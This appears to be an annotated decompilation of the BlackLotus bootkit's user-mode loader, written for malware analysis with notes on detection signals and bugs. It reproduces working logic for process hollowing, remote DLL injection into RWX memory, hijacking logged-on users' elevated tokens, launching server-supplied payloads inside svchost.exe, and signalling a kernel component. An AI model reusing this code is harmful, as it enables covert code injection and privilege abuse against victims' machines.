        //     a1->LoadLibraryA = get_proc_address_by_hash((int)dllbase, 0xDF2BBBEC);// LoadLibraryA
        //     while ( targetpe_importaddr->DUMMYUNIONNAME.Characteristics )
        //     {
        //       OriginalFirstThunk = (_IMAGE_THUNK_DATA32 *)(a1->targetpe_addr
        //                                                  + targetpe_importaddr->DUMMYUNIONNAME.Characteristics);
        //       v11 = (_IMAGE_THUNK_DATA32 *)(a1->targetpe_addr + targetpe_importaddr->FirstThunk);
        //       v10 = ((int (__stdcall *)(DWORD))a1->LoadLibraryA)(a1->targetpe_addr + targetpe_importaddr->Name);
        //       if ( !v10 )
        //         return 1;

        //       Characteristics = OriginalFirstThunk->u1.ForwarderString;
        //       if ( OriginalFirstThunk->u1.ForwarderString )
        //       {
        //         v12 = (DLL32ST *)((char *)v11 - (char *)OriginalFirstThunk);
        //         do
        //         {
        //           v6 = Characteristics >= 0 ? Characteristics + a1->targetpe_addr + 2 : (unsigned __int16)Characteristics;
        //           v7 = ((int (__stdcall *)(int, int))a1->GetProcAddress)(v10, v6);
        //           if ( !v7 )
        //             return 1;

        //           *(DWORD *)((char *)&OriginalFirstThunk->u1.ForwarderString + (_DWORD)v12) = v7;
        //           ++OriginalFirstThunk;
        //           Characteristics = OriginalFirstThunk->u1.ForwarderString;
        //         }
        //         while ( OriginalFirstThunk->u1.ForwarderString );
        //       }

        //       ++targetpe_importaddr;
        //     }
        //   }

        //   dllmain = a1->targetpe_ntheader->OptionalHeader.AddressOfEntryPoint;
        //   if ( dllmain )
        //     // BOOL WINAPI DllMain(
        //     //     HINSTANCE hinstDLL,  // handle to DLL module
        //     //     DWORD fdwReason,     // reason for calling function
        //     //     LPVOID lpvReserved )  // reserved
        //     ((void (__stdcall *)(int, int, _DWORD))(dllmain + a1->targetpe_addr))(a1->targetpe_addr, 1, 0);

        //   return 1;
        // }
        && NtWriteVirtualMemory(lpProcessInformation->hProcess, BaseAddress, &dll32st, 0x14ui64, 0i64) >= 0
        && NtCreateThreadEx(
             &Handle,
             0x1FFFFFu,
             0i64,
             lpProcessInformation->hProcess,
             &v10[v4->OptionalHeader.AddressOfEntryPoint],
             BaseAddress,
             0,
             0i64,
             0i64,
             0i64,
             0i64) >= 0 )
      {
        v7 = 1;
      }
    }
  }

  if ( Handle )
    NtClose(Handle);

  return v7;
}


// 64-bit counterpart of x86exe_hollow_140003D1C:
//   1. read the initial thread's context,
//   2. get the PEB address (PROCESS_BASIC_INFORMATION.PebBaseAddress, the
//      second qword of the 0x30-byte buffer),
//   3. map the payload (mapPE64_140003B14, last arg 1),
//   4. overwrite PEB->ImageBaseAddress (offset 0x10, 8 bytes),
//   5. set RCX — where the x64 initial thread receives its entry point —
//      to the payload's AddressOfEntryPoint and resume.
// Returns 1 on success, 0 otherwise. As in the x86 path, no unmap of the
// original host image is visible here.
__int64 __fastcall x64exe_hollow_140003E38(
        struct _PROCESS_INFORMATION *lpProcessInformation,
        char *data,
        _IMAGE_NT_HEADERS64 *ntheader64)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v6 = 0;
  memset(&v11, 0, sizeof(v11));
  hThread = lpProcessInformation->hThread;
  v11.ContextFlags = CONTEXT_FULL;
  memset(ProcessInformation_8, 0, sizeof(ProcessInformation_8));
  if ( NtGetContextThread(hThread, &v11) >= 0
    && NtQueryInformationProcess(
         lpProcessInformation->hProcess,
         ProcessBasicInformation,
         ProcessInformation_8,
         0x30u,
         0i64) >= 0 )
  {
    v12 = mapPE64_140003B14(lpProcessInformation, data, 0i64, ntheader64, 1);
    if ( v12 )
    {
      // ProcessInformation_8[1] = PebBaseAddress; PEB + 0x10 = ImageBaseAddress
      if ( NtWriteVirtualMemory(
             lpProcessInformation->hProcess,
             (PVOID)(ProcessInformation_8[1] + 16i64),
             &v12,
             8ui64,
             0i64) >= 0 )
      {
        v8 = lpProcessInformation->hThread;
        v11.Rcx = (DWORD64)&v12[ntheader64->OptionalHeader.AddressOfEntryPoint];
        if ( NtSetContextThread(v8, &v11) >= 0 && NtResumeThread(lpProcessInformation->hThread, 0i64) >= 0 )
          return 1;
      }
    }
  }

  return v6;
}


// 64-bit counterpart of x86dll_140003728. Here the loader stub is a blob of
// position-independent code (dllload_stub_140003C54, 0xC6 bytes) rather than
// a mapped PE: one RWX page (0x3000 = MEM_COMMIT|MEM_RESERVE,
// 0x40 = PAGE_EXECUTE_READWRITE) receives the 0x28-byte parameter block at
// offset 0 and the stub at offset 0x28, and a remote thread is started at
// page+0x28 with the page as its argument.
//
// The stub is given THIS process's LoadLibraryA / GetProcAddress addresses,
// so it relies on kernel32 being loaded at the same address in the host.
// Private RWX allocation with a thread started inside it is a strong
// detection signal. The host's original thread is never resumed here.
// Returns 1 on success, 0 otherwise.
__int64 __fastcall x64dll_140003890(
        struct _PROCESS_INFORMATION *lpProcessInformation,
        char *data,
        _IMAGE_NT_HEADERS64 *ntheader64)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  RegionSize = 4096i64;
  Handle = 0i64;
  BaseAddress = 0i64;
  memset(&Buffer, 0, sizeof(Buffer));
  v6 = 0;
  v7 = mapPE64_140003B14(lpProcessInformation, data, 0i64, ntheader64, 0);
  if ( v7 )
  {
    Buffer.targetpe_addr = v7;
    // e_lfanew is the 16th DWORD of the DOS header
    Buffer.targetpe_ntheader64 = (_IMAGE_NT_HEADERS64 *)&v7[*((int *)data + 15)];
    hProcess = lpProcessInformation->hProcess;
    Buffer.targetpe_importaddr = (_IMAGE_IMPORT_DESCRIPTOR *)&v7[ntheader64->OptionalHeader.DataDirectory[1].VirtualAddress];// import table
    Buffer.LoadLibraryA = LoadLibraryA;
    Buffer.GetProcAddress = GetProcAddress;
    if ( NtAllocateVirtualMemory(hProcess, &BaseAddress, 0i64, &RegionSize, 0x3000u, 0x40u) >= 0
      && NtWriteVirtualMemory(lpProcessInformation->hProcess, BaseAddress, &Buffer, 0x28ui64, 0i64) >= 0
      // stub code directly after the parameter block, same RWX page
      && NtWriteVirtualMemory(
           lpProcessInformation->hProcess,
           (char *)BaseAddress + 0x28,
           dllload_stub_140003C54,
           0xC6ui64,
           0i64) >= 0
      // 0x1FFFFF = THREAD_ALL_ACCESS; start = stub, argument = parameter block
      && NtCreateThreadEx(
           &Handle,
           0x1FFFFFu,
           0i64,
           lpProcessInformation->hProcess,
           (char *)BaseAddress + 40,
           BaseAddress,
           0,
           0i64,
           0i64,
           0i64,
           0i64) >= 0 )
    {
      v6 = 1;
    }
  }

  if ( Handle )
    NtClose(Handle);

  return v6;
}
Create_ProcessAsUserW_method2_140006E0C
// Starts the dropped file in a new, windowless process under hToken /
// lpEnvironment (both may be NULL). The command line is assembled in
// lpCommandLine (0x212 wide chars):
//   isEXE  : "<path>[<cmdline>]"
//   isDll  : "<cmd_prefix><path>"            cmd_prefix = "regsvr32 /s " (set by
//                                            command_type1_140006318); cmdline ignored
//   other  : "<cmd_prefix><path>[<cmdline>]" cmd_prefix = "cmd /c "
// Returns CreateProcessAsUserW's BOOL; both returned handles are closed at once.
//
// NOTE(review): lpCommandLine is not among the visible declarations; if it is
// a file-scope buffer, the launcher threads share it — confirm.
__int64 __fastcall Create_ProcessAsUserW_method2_140006E0C(
        HANDLE hToken,
        void *lpEnvironment,
        ThreadParameter *parameter)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  memset(&lpProcessInformation, 0, sizeof(lpProcessInformation));
  memset(&lpStartupInfo, 0, sizeof(lpStartupInfo));
  v6 = lpCommandLine;
  v7 = 0x212i64;                                // copy bound = 530 wide chars
  if ( parameter->isEXE )
  {
    // bounded copy of parameter->path; the 0xFFFFFFFF80000214 test is an
    // inlined copy guard, not program logic
    v8 = (char *)parameter->path - (char *)lpCommandLine;
    do
    {
      if ( v7 == 0xFFFFFFFF80000214ui64 )
        break;

      v9 = *(wchar_t *)((char *)v6 + v8);
      if ( !v9 )
        break;

      *v6++ = v9;
      --v7;
    }
    while ( v7 );

    v10 = v6 - 1;
    if ( v7 )
      v10 = v6;

    *v10 = 0;
  }
  else
  {
    // same bounded copy, but of cmd_prefix; -2147483116 is the signed
    // spelling of 0xFFFFFFFF80000214 used above
    v11 = (char *)parameter->cmd_prefix - (char *)lpCommandLine;
    do
    {
      if ( v7 == -2147483116 )
        break;

      v12 = *(wchar_t *)((char *)v6 + v11);
      if ( !v12 )
        break;

      *v6++ = v12;
      --v7;
    }
    while ( v7 );

    path = parameter->path;
    v14 = v6 - 1;
    if ( v7 )
      v14 = v6;

    *v14 = 0;
    wscat(lpCommandLine, 0x212i64, (__int64)path);
  }

  // cmdline (already space-prefixed) is appended unless the file is a DLL
  cmdline = parameter->cmdline;
  if ( cmdline && !parameter->isDll )
    wscat(lpCommandLine, 0x212i64, (__int64)cmdline);

  v16 = CreateProcessAsUserW(
          hToken,
          0i64,
          lpCommandLine,
          0i64,
          0i64,
          0,
          0xA000420u,                           // CREATE_NO_WINDOW
                                                // 0x08000000
                                                // CREATE_PRESERVE_CODE_AUTHZ_LEVEL
                                                // 0x02000000
                                                // CREATE_UNICODE_ENVIRONMENT
                                                // 0x00000400
                                                // #define NORMAL_PRIORITY_CLASS             0x00000020
          lpEnvironment,
          0i64,
          &lpStartupInfo,
          &lpProcessInformation);
  if ( v16 )
  {
    // fire and forget: no wait on the child
    NtClose(lpProcessInformation.hProcess);
    NtClose(lpProcessInformation.hThread);
  }

  return v16;
}
privilege_4_5_140006804
// Launcher thread for User modes '4' and '5' (started by
// command_type1_140006318 with THREAD_ALL_ACCESS in this process).
//
// Polls every second for an active interactive session and takes its primary
// user token with WTSQueryUserToken (requires SeTcbPrivilege, i.e. this code
// is expected to run as SYSTEM). Mode '5' (parameter->isUser3or5) additionally
// requires that token to hold BUILTIN\Administrators; because
// getSessionId_140007648 always returns the FIRST WTSActive session, that
// loop effectively waits for the console user to be an admin.
// Then: build the user's environment block, prefer the UAC linked (elevated)
// token when there is one, and launch by Method ('1' suspended host +
// hollow/inject, '2' run the dropped file). Frees `parameter` on exit.
//
// Leaks: the linked token handle (LinkedToken) is never closed; only Handle
// is. Returns 0 always.
__int64 __fastcall privilege_4_5_140006804(ThreadParameter *parameter)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  Handle = 0i64;
  v9 = 0i64;
  memset(&ProcessInformation, 0, sizeof(ProcessInformation));
  while ( 1 )
  {
    // wait for an active session (0 = none / also session 0, see getSessionId)
    do
    {
      Sleep(1000u);
      SessionId = getSessionId_140007648();
    }
    while ( !SessionId );

    if ( !WTSQueryUserToken(SessionId, &Handle) )
      break;

    if ( (unsigned int)isAdmin_14000879C(Handle) || !parameter->isUser3or5 )// admin, or mode 4 which accepts any user
    {
      // 1 = inherit this process's environment into the block
      if ( CreateEnvironmentBlock(&v9, Handle, 1) )
      {
        // elevated half of a split (UAC) token, NULL if there is none
        LinkedToken = getLinkedToken_1400076B4(Handle);
        if ( *(_WORD *)&parameter->Method == '1' )
        {
          hToken = Handle;
          if ( LinkedToken )
            hToken = LinkedToken;

          if ( (unsigned int)Create_ProcessAsUserW_method1_suspended_140006F88(
                               hToken,
                               v9,
                               parameter,
                               &ProcessInformation) )
            load_Terminate_14000368C(parameter, &ProcessInformation);
        }

        else if ( *(_WORD *)&parameter->Method == '2' )
        {
          v4 = Handle;
          if ( LinkedToken )
            v4 = LinkedToken;

          Create_ProcessAsUserW_method2_140006E0C(v4, v9, parameter);
        }
      }

      break;
    }

    // mode 5 and the user is not an admin: drop the token and poll again
    NtClose(Handle);
    Handle = 0i64;
  }

  if ( v9 )
    DestroyEnvironmentBlock(v9);

  if ( Handle )
    NtClose(Handle);

  if ( parameter )
    free_140007354(parameter);

  return 0i64;
}

// Returns the SessionId of the first terminal session whose State is
// WTSActive (0), or 0 when none is active or enumeration fails.
// Caveat: session 0 is also the "not found" value, so an active session 0
// cannot be distinguished from failure; callers treat 0 as "keep polling".
__int64 getSessionId_140007648()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  SessionId = 0;
  count = 0;
  pSessions = 0i64;
  if ( WTSEnumerateSessionsW(0i64, 0, 1u, &pSessions, &count) )
  {
    i = 0;
    if ( count )
    {
      // skip every entry whose State != WTSActive
      while ( pSessions[i].State )
      {                                         // typedef enum _WTS_CONNECTSTATE_CLASS {
                                                //     WTSActive,              // User logged on to WinStation
                                                //     WTSConnected,           // WinStation connected to client
                                                //     WTSConnectQuery,        // In the process of connecting to client
                                                //     WTSShadow,              // Shadowing another WinStation
                                                //     WTSDisconnected,        // WinStation logged on without client
                                                //     WTSIdle,                // Waiting for client to connect
                                                //     WTSListen,              // WinStation is listening for connection
                                                //     WTSReset,               // WinStation is being reset
                                                //     WTSDown,                // WinStation is down due to error
                                                //     WTSInit,                // WinStation in initialization
                                                // } WTS_CONNECTSTATE_CLASS;
        if ( ++i >= count )
          goto LABEL_7;
      }

      SessionId = pSessions[i].SessionId;
    }

LABEL_7:
    WTSFreeMemory(pSessions);
  }

  return SessionId;
}

// Returns 1 if the token's group list (TokenInformationClass 2 = TokenGroups)
// contains BUILTIN\Administrators (S-1-5-32-544), else 0.
//
// Buf1 (4 zero bytes) and v11 = 1280 = 0x0500 (little-endian 00 05) together
// form SECURITY_NT_AUTHORITY {0,0,0,0,0,5} for the 6-byte memcmp — assuming
// the two locals are laid out contiguously on the stack; verify in the
// disassembly.
//
// Caveats:
//  - The SID attributes (second qword of each SID_AND_ATTRIBUTES, skipped by
//    `v5 += 2`) are ignored, so a UAC-filtered token whose Administrators
//    group is SE_GROUP_USE_FOR_DENY_ONLY still counts as admin. The callers
//    compensate by switching to the linked (elevated) token afterwards.
//  - The TokenGroups buffer is never freed on the success path: RtlFreeHeap
//    is only reached — with NULL — when the allocation failed. Leak.
__int64 __fastcall isAdmin_14000879C(HANDLE TokenHandle)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v1 = 0;
  v11 = 1280;
  TokenInformationLength = 0;
  Buf1 = 0;
  // size query, then the real query
  NtQueryInformationToken(TokenHandle, 2, 0i64, 0, &TokenInformationLength);
  Heap = (void **)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, TokenInformationLength);
  if ( Heap )
  {
    if ( NtQueryInformationToken(TokenHandle, 2, Heap, TokenInformationLength, &TokenInformationLength) >= 0 )
    {
      v4 = *(_DWORD *)Heap;                     // TOKEN_GROUPS.GroupCount
      if ( *(_DWORD *)Heap )
      {
        v5 = Heap + 1;                          // Groups[0].Sid (GroupCount is padded to 8)
        while ( 1 )
        {
          v6 = *v5;
          v5 += 2;                              // next SID_AND_ATTRIBUTES (16 bytes); Attributes not read
          // S-1-5-32-544: two sub-authorities, 32 then 544
          if ( *RtlSubAuthorityCountSid(v6) == 2
            && *RtlSubAuthoritySid(v6, 0) == SECURITY_BUILTIN_DOMAIN_RID
            && *RtlSubAuthoritySid(v6, 1u) == DOMAIN_ALIAS_RID_ADMINS )
          {
            v7 = RtlIdentifierAuthoritySid(v6);
            if ( !memcmp(&Buf1, v7, 6u) )
              break;
          }

          if ( !--v4 )
            return v1;
        }

        return 1;
      }
    }
  }
  else
  {
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, 0i64);
  }

  return v1;
}
AdminPrivilege_2_3_140006640
// Launcher thread for User modes '2' and '3' (started by
// command_type1_140006318).
//
// Every 5 s it re-enumerates terminal sessions and launches the payload once
// per distinct logged-on user, tracking served users as a list of up to 50
// username hashes in `usernames` (v11 = count). Mode '3' (a1->isUser3or5)
// only serves users whose token holds BUILTIN\Administrators; for admins the
// UAC linked (elevated) token is preferred. Because GetLogUser_140007558
// returns 0 once every current user has been served, the loop keeps running
// — catching users who log on later — until 50 users have been seen or
// WTSEnumerateSessionsW fails. WTSQueryUserToken requires SeTcbPrivilege.
//
// Leaks: the linked token handle (LinkedToken / v8) is never closed; only
// Handle is. Frees `a1` on exit; returns 0 always.
__int64 __fastcall AdminPrivilege_2_3_140006640(ThreadParameter *a1)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  ppSessionInfo = 0i64;
  Environment = 0i64;
  memset(usernames, 0, sizeof(usernames));
  v11 = 0;
  while ( WTSEnumerateSessionsW(0i64, 0, 1u, &ppSessionInfo, &Count) )
  {
    // capacity of `usernames`; GetLogUser does not bound-check on its own
    if ( v11 >= 50 )
      break;

    memset(&ProcessInformation, 0, sizeof(ProcessInformation));
    memset(&v8, 0, sizeof(v8));
    Sleep(0x1388u);                             // 5000 ms
    // first session whose user has not been served yet, 0 if none
    sessionid = GetLogUser_140007558(ppSessionInfo, Count, usernames, &v11);
    if ( sessionid && WTSQueryUserToken(sessionid, &Handle) )
    {
      // mode 3 requires an admin token; mode 2 accepts anyone
      if ( (!a1->isUser3or5 || (unsigned int)isAdmin_14000879C(Handle))
        && CreateEnvironmentBlock(&Environment, Handle, 1) )
      {
        if ( (unsigned int)isAdmin_14000879C(Handle) )
        {
          LinkedToken = getLinkedToken_1400076B4(Handle);
          v8 = LinkedToken;
        }
        else
        {
          LinkedToken = v8;                     // NULL (zeroed above)
        }

        if ( *(_WORD *)&a1->Method == '1' )
        {
          v4 = Handle;
          if ( LinkedToken )
            v4 = LinkedToken;

          if ( (unsigned int)Create_ProcessAsUserW_method1_suspended_140006F88(v4, Environment, a1, &ProcessInformation) )
            load_Terminate_14000368C(a1, &ProcessInformation);
        }

        else if ( *(_WORD *)&a1->Method == 50 )  // 50 == '2' (run the dropped file)
        {
          v5 = Handle;
          if ( LinkedToken )
            v5 = LinkedToken;

          Create_ProcessAsUserW_method2_140006E0C(v5, Environment, a1);
        }

        DestroyEnvironmentBlock(Environment);
      }

      NtClose(Handle);
    }

    WTSFreeMemory(ppSessionInfo);
  }

  if ( a1 )
    free_140007354(a1);

  return 0i64;
}

// Scans the session table `a1[0..a2)` for the first session whose user name
// (hashed with w_hash_140005294) is not yet in `username[0..*pi)`. Records
// the hash at username[*pi], increments *pi and returns that SessionId.
// Returns 0 when every session with a non-empty user name has already been
// served (or there is none). Sessions with an empty user name are skipped.
//
// Caveats:
//  - No bound check on `username`; the caller (AdminPrivilege_2_3_140006640)
//    stops at 50 entries before calling.
//  - The WTS buffer `Str` is leaked on the success path: WTSFreeMemory is
//    only reached when the name was empty or already seen.
__int64 __fastcall GetLogUser_140007558(PWTS_SESSION_INFOW a1, unsigned int a2, _DWORD *username, _DWORD *pi)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  SessionId = 0;
  Str = 0i64;
  v9 = 0;
  if ( a2 )
  {
    v10 = a1;
    do
    {
      if ( WTSQuerySessionInformationW(0i64, v10->SessionId, WTSUserName, &Str, &v18) )
      {
        if ( (unsigned int)wcslen(Str) )
        {
          v11 = w_hash_140005294(Str);
          v12 = 0;
          // empty seen-list: first user wins
          if ( !*pi )
            goto LABEL_14;

          // linear search of the seen-list for this hash
          v13 = (unsigned int)*pi;
          v14 = username;
          do
          {
            if ( v11 == *v14++ )
              v12 = 1;

            --v13;
          }
          while ( v13 );

          if ( !v12 )
          {
LABEL_14:
            SessionId = a1[v9].SessionId;
            username[(*pi)++] = w_hash_140005294(Str);
            return SessionId;
          }
        }

        WTSFreeMemory(Str);
      }

      ++v9;
      ++v10;
    }
    while ( v9 < a2 );
  }

  return SessionId;
}

// Queries TokenLinkedToken on `a1` and returns the linked token handle — for
// a UAC split token that is the other (elevated) half. Returns NULL when the
// query fails, which is presumably the case for tokens with no linked token.
// The returned handle is owned by the caller and must be closed; none of the
// callers in this listing (privilege_4_5_140006804,
// AdminPrivilege_2_3_140006640) close it.
HANDLE __fastcall getLinkedToken_1400076B4(void *a1)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v1 = 0i64;
  v4.LinkedToken = 0i64;
  v3 = 0;
  // TOKEN_LINKED_TOKEN is a single HANDLE (8 bytes)
  if ( NtQueryInformationToken(a1, TokenLinkedToken, &v4, 8u, &v3) >= 0 )
    return v4.LinkedToken;

  return (HANDLE)v1;
}

command_type2_140006BB0

// Handles a "type 2" command from the server: fetches the payload for this
// command, decides how it will be hosted and hands a ThreadParameter to
// launch_14000691C().
// - httpst/wsvalue: parsed server response (Method and FileType are read here;
//   getData_by_auth_token_140004108() pulls the payload bytes).
// - isSuccess: set by command_type3_140006B78() when the kernel side acknowledged;
//   it is not cleared here, so the caller must initialise it.
// Only payloads whose FileType starts with "exe" proceed; everything else is dropped.
// Target path: for Method '2' the payload is written to disk by savefile_1400088C4();
// otherwise the path is the system svchost.exe (SysWOW64 for a 32-bit PE), presumably
// used as a host process for the in-memory image — confirm in launch_14000691C().
// Detection angle: svchost.exe started from an interactive session by a parent
// other than services.exe.
void __fastcall command_type2_140006BB0(HttpST *httpst, WsValue *wsvalue, _DWORD *isSuccess)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // 8 == HEAP_ZERO_MEMORY; 0x40 bytes is the decompiler's size for ThreadParameter.
  Heap = (ThreadParameter *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x40ui64);
  v7 = Heap;
  if ( Heap )
  {
    p_datasz = &Heap->datasz;
    Data = getData_by_auth_token_140004108(httpst, wsvalue, &Heap->datasz);
    v7->data = Data;
    if ( !Data || !*p_datasz )
      goto LABEL_12;                            // nothing downloaded

    v10 = *wsvalue->Method;                     // only the first character of Method is kept
    *p_datasz = 0;                              // datasz reset to 0 once the buffer is attached (intent unclear here)
    *(_WORD *)&v7->Method = v10;
    v11 = isPEx86_140003C1C((__int64)Data, 0);  // bitness of the downloaded PE
    v7->cmdline = 0i64;
    v7->isDll = 0;
    v7->isX86 = v11;
    FileType = wsvalue->FileType;
    if ( *FileType != 'e' )
      goto LABEL_8;

    if ( FileType[1] == 'x' && FileType[2] == 'e' )   // FileType begins with "exe" (no terminator check)
      v13 = 1;
    else
LABEL_8:
      v13 = 0;

    v7->isUser3or5 = 0;
    v7->isEXE = v13;
    if ( !v13 )
      goto LABEL_12;                            // non-exe payloads are dropped

    if ( *wsvalue->Method == '2' )
    {
      // Method '2': write the payload to disk; path is the file it was saved to.
      v14 = savefile_1400088C4(v7->data, 0, wsvalue);
      v7->path = v14;
      if ( !v14 )
      {
LABEL_12:
        // NOTE(review): only the ThreadParameter is released here; whether
        // free_140007354() also frees v7->data is not visible in this listing.
        free_140007354(v7);
        return;
      }
    }
    else
    {
      // Other methods: path = "<drive>:\Windows\System32\svchost.exe" (SysWOW64 for x86).
      // 0x208 bytes == 260 (MAX_PATH) WCHARs.
      v15 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x208ui64);
      v7->path = v15;
      if ( !v15 )
        goto LABEL_12;

      *v7->path = ret_disk_drivenumber_140008000();   // drive letter of the system volume, presumably
      // :\Windows\System32\svchost.exe
      v16 = x64svchost_14000B5E0;
      if ( v7->isX86 )
        // :\Windows\SysWOW64\svchost.exe
        v16 = x86svchost_14000B620;

      v17 = deobfuscate_wstring((WORD *)v16, 0x1Fu, 1);   // strings are stored obfuscated; 0x1F WCHARs
      wscat(v7->path, 260i64, (__int64)v17);
    }

    // Signal the kernel component ('U' message) before launching; abort if it does not answer.
    command_type3_140006B78(isSuccess);
    if ( *isSuccess )
    {
      launch_14000691C(v7);                     // v7 is not freed on this path
      return;
    }

    goto LABEL_12;
  }
}

command_type3_140006B78

// Sends a 'U' message with no payload through the section/event channel
// (evnet_section_2sys_1400082F0) and sets *isSuccess = 1 if the peer answered.
// *isSuccess is left untouched on failure, so callers must initialise it.
// Returns the raw result of evnet_section_2sys_1400082F0 (1 on acknowledgement, else 0).
__int64 __fastcall command_type3_140006B78(_DWORD *isSuccess)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  *(_DWORD *)v3.tag = 'U';                      // tag bytes: 'U', 0, 0, 0
  v3.datasz = 0;                                // no payload
  *(_QWORD *)v3.data = 0i64;
  result = evnet_section_2sys_1400082F0(&v3);
  if ( (_DWORD)result )
    *isSuccess = 1;

  return result;
}
evnet_section_2sys_1400082F0

//与BlackLotus内核通信的数据结构,通过event 和Section 传递

// Message exchanged with the kernel component through a named section (see
// evnet_section_2sys_1400082F0): a 4-byte tag, the payload length, then payload.
// The sender copies datasz + 16 bytes (16 == sizeof this struct), so data[8] is
// only the inline minimum; longer messages presumably extend past the end of
// the struct — confirm against the kernel-side reader.
struct sectiondata

{

char tag[4];                                    // message type, e.g. 'U' in command_type3_140006B78

int datasz;                                     // number of payload bytes

char data[8];                                   // inline payload (or its first 8 bytes)

};

// User-mode side of the section/event channel to the kernel component.
// Copies the message in *data into a fresh named section under \BaseNamedObjects,
// then creates an event with the same name except that the first character after
// the "\BaseNamedObjects\" prefix is replaced by 'Z', and waits up to 10 s for the
// peer to signal it. Returns 1 only if the wait returned STATUS_SUCCESS; a timeout
// or any earlier failure returns 0. The view, event and section are released on exit.
// Detection angle: a section and an event whose names differ only in that leading
// 'Z', created back-to-back by the same user-mode process, is the observable artifact.
__int64 __fastcall evnet_section_2sys_1400082F0(sectiondata *data)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v1 = 0;                                       // return value; 1 == acknowledged
  SectionHandle = 0i64;
  Handle = 0i64;                                // event handle
  ViewSize = 0i64;
  BaseAddress = 0i64;
  memset(name, 0, sizeof(name));
  v3.QuadPart = (unsigned int)data->datasz + 16i64;   // header (16 bytes) + payload
  Timeout.QuadPart = -100000000i64;             // relative, 100 ns units: 10 seconds
  MaximumSize = v3;
  if ( (unsigned int)gen_BaseNamedObjects_machex_140008038(name) )// \BaseNamedObjects\xxxxxx
  {
    RtlInitUnicodeString(&DestinationString, name);   // references `name`, which is patched below
    oatt.RootDirectory = 0i64;
    oatt.ObjectName = &DestinationString;
    oatt.Length = 48;                           // sizeof(OBJECT_ATTRIBUTES) on x64
    oatt.Attributes = 512;                      // 0x200 == OBJ_KERNEL_HANDLE (ignored for user-mode callers)
    *(_OWORD *)&oatt.SecurityDescriptor = 0i64; // no explicit security descriptor / SQOS
    // SECTION_ALL_ACCESS (0xF001F), PAGE_READWRITE (4), SEC_COMMIT (0x8000000), no backing file
    if ( NtCreateSection(&SectionHandle, 0xF001Fu, &oatt, &MaximumSize, 4u, 0x8000000u, 0i64) >= 0
      && NtMapViewOfSection(
           SectionHandle,
           (HANDLE)0xFFFFFFFFFFFFFFFFi64,       // current process
           &BaseAddress,
           0i64,
           0i64,
           0i64,
           &ViewSize,                           // 0 == map the whole section
           ViewUnmap,
           0,
           4u) >= 0 )                           // PAGE_READWRITE
    {
      // Copies the whole message into the view; the length passed is in bytes,
      // the same value used for MaximumSize.
      strcpyWs_14000102C((char *)BaseAddress, (wchar_t *)data, (unsigned int)data->datasz + 16i64);
      name[0x12] = 0x5A;                        // evnet-->\BaseNamedObjects\Zxxxxx
      // EVENT_ALL_ACCESS (0x1F0003), manual-reset, initially non-signalled; oatt still
      // points at `name`, so the event gets the patched name. The wait is alertable (1);
      // NtWaitForSingleObject returns 0 only when signalled, STATUS_TIMEOUT is non-zero.
      if ( NtCreateEvent(&Handle, 0x1F0003u, &oatt, NotificationEvent, 0) >= 0
        && !NtWaitForSingleObject(Handle, 1u, &Timeout) )
      {
        v1 = 1;
      }
    }
  }

  if ( BaseAddress )
    NtUnmapViewOfSection((HANDLE)0xFFFFFFFFFFFFFFFFi64, BaseAddress);

  if ( Handle )
    NtClose(Handle);

  if ( SectionHandle )
    NtClose(SectionHandle);

  return v1;
}